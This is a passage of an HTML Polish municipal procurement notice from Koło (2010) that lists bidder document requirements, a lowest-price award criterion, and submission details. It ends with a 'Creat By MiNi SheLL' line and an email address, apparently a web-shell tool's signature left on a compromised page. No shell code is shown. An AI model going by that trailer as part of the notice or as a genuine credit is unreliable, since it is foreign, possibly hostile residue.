<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów, jeżeli jest wymagane, 
2) pełnomocnictwo do składania oferty łącznej w zakresie określonym w art. 23 ust. 2 Ustawy, jeżeli jest wymagane.
3) harmonogram rzeczowo -terminowo-finansowy
4) dokumenty, o których mowa jest w Rozdziale II ust. 13 SIWZ, jeżeli są wymagane
5) zobowiązanie do udostępnienia zasobów przez inne podmioty, zgodnie z Załącznikiem Nr 5,
6) zakres rzeczowy oraz wartość robót budowlanych, usług i dostaw, które zostaną wykonane przy udziale podwykonawców - na Załączniku Nr 6</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) termin realizacji
2) kierownik budowy
3) inspektor nadzoru
Na zasadach określonych w druku PROJEKT UMOWY.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kolo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kole, Wydział Zamówień Publicznych, 62-600 Koło, ul. Mickiewicza 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2010 godzina 12:00, miejsce: Urząd Miejski w Kole, 62-600 Koło, ul. Mickiewicza 12, Sekretariat Burmistrza Miasta Koła, pok. nr 9 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com